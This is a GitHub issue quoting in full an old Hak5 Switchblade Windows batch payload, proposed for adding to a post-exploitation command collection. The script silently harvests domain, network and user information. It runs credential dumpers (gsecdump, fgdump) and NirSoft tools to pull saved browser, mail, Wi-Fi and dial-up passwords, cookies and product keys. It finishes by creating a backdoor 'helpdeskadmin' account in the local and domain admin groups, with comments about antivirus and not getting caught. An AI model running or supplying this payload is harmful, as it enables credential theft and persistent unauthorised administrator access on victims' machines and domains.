Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Cherry pick the "good" stuff out of the old Hak5 Switchblade commands #54

Open
mubix opened this issue Nov 11, 2013 · 0 comments
Open

Cherry pick the "good" stuff out of the old Hak5 Switchblade commands #54

mubix opened this issue Nov 11, 2013 · 0 comments
Labels
new content

Comments

@mubix
Copy link
Owner

mubix commented Nov 11, 2013 


Got the link for this from: http://synjunkie.blogspot.com/2008/03/basic-dos-foo.html




::start of file
@echo off
::create the directory with a computer name for the system and move there
if not exist \switchblade\dump md \switchblade\dump >nul
if not exist \switchblade\dump\%computername% md \switchblade\dump\%computername% >nul
cd \switchblade\tools\ >nul
::create netdump.txt with all the information that the dos command net.exe will extract
  echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
  ipconfig /all >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
  route print >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
  ipconfig /displaydns >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
  netstat -anbv >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
  netsh diag show all /v >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
  netsh firewall show conf >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
  netsh firewall show port >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
  arp -a >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
  net session >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
::user info creation
  echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
  net view >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
  net share >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
  net accounts >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
  net localgroup >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
  net localgroup /domain >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
  net localgroup administrators /domain >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
  net group "domain admins" /domain >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
  net group "backup operators" /domain >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
  net group "domain users" /domain >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
  gpresult >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
  .\whosthere.exe >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
  .\whosthere-alt.exe >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
.\gsecdump.exe -a >> \switchblade\dump\%computername%\%computername%-user 2>&1
::dump other PC info
  echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \switchblade\dump\%computername%\%computername%-PC.log 2>&1
  net start >> \switchblade\dump\%computername%\%computername%-PC.log 2>&1
  set >> \switchblade\dump\%computername%\%computername%-PC.log 2>&1
  tree /f >> \switchblade\dump\%computername%\%computername%-PC.log 2>&1
::slurp Browser info
  echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \switchblade\dump\%computername%\%computername%_browser.log 2>&1
  cscript //nologo .\iehistquick.vbs >> \switchblade\dump\%computername%\%computername%_browser.log 2>&1
IF EXIST "C:\Program Files\Mozilla Firefox\firefox.exe" .\FirePassword.exe >> \switchblade\dump\%computername%\%computername%_browser.log 2>&1
echo ***********[End Of File]************ >> \switchblade\dump\%computername%\%computername%_browser.log 2>&1
::create the  nirsoft tools html files, some of them are known hacktools and will crash out script depends on your AV killer to run first
nircmd.exe exec2 hide "\switchblade\dump\%computername%" "\switchblade\tools\fgdump.exe" -s -r -k
nircmd.exe execmd mylastsearch.exe /shtml "\switchblade\dump\~$sys.computername$\InternetSearch.html"
nircmd.exe execmd pspv.exe /shtml "\switchblade\dump\~$sys.computername$\IEPassword.html"
nircmd.exe execmd iepv.exe /shtml "\switchblade\dump\~$sys.computername$\IEProtected.html"
nircmd.exe execmd nk2view.exe /shtml "\switchblade\dump\~$sys.computername$\recentEmail.html"
nircmd.exe execmd recentfilesview.exe /shtml "\switchblade\dump\~$sys.computername$\recentfiles.html"
IF EXIST "C:\Program Files\Mozilla Firefox\firefox.exe" nircmd.exe execmd passwordfox.exe /shtml "\switchblade\dump\~$sys.computername$\FFPassword.html"
nircmd.exe execmd USBDeview.exe /shtml "\switchblade\dump\~$sys.computername$\USB.html"
nircmd.exe execmd mspassSLURP.exe /shtml "\switchblade\dump\~$sys.computername$\msn.html"
nircmd.exe execmd netpass.exe /shtml "\switchblade\dump\~$sys.computername$\netpassword.html"
nircmd.exe execmd iehv.exe /shtml "\switchblade\dump\~$sys.computername$\IEhistory.html"
nircmd.exe execmd ProduKey.exe /shtml "\switchblade\dump\~$sys.computername$\keys.html"
nircmd.exe execmd MozillaHistoryView.exe /shtml "\switchblade\dump\~$sys.computername$\FFXHistory.html"
nircmd.exe execmd WirelessKeyView.exe /shtml "\switchblade\dump\~$sys.computername$\Wireless.html"
nircmd.exe execmd mailpv.exe /shtml "\switchblade\dump\~$sys.computername$\mail.html"
nircmd.exe execmd mzcv.exe /shtml "\switchblade\dump\~$sys.computername$\FFXCookie.html"
nircmd.exe execmd cports.exe /shtml "\switchblade\dump\~$sys.computername$\OpenPorts.html"
nircmd.exe execmd chromepass.exe /shtml "\switchblade\dump\~$sys.computername$\ChromePass.html"
nircmd.exe execmd chromecacheview.exe /shtml "\switchblade\dump\~$sys.computername$\ChromePass.html"
nircmd.exe execmd OpenedFilesView.exe /shtml "\switchblade\dump\~$sys.computername$\openfiles.html"
nircmd.exe execmd wul.exe /shtml "\switchblade\dump\~$sys.computername$\updates-bugfixes.html"
nircmd.exe execmd dialupass2.exe /shtml "\switchblade\dump\~$sys.computername$\DialUp2.html"
::finally if we didnt get caught
net user helpdeskadmin Password!@#$ /add
net localgroup Administrators helpdeskadmin /add
net group "domain admins" helpdeskadmin /add
exit
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
new content
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@mubix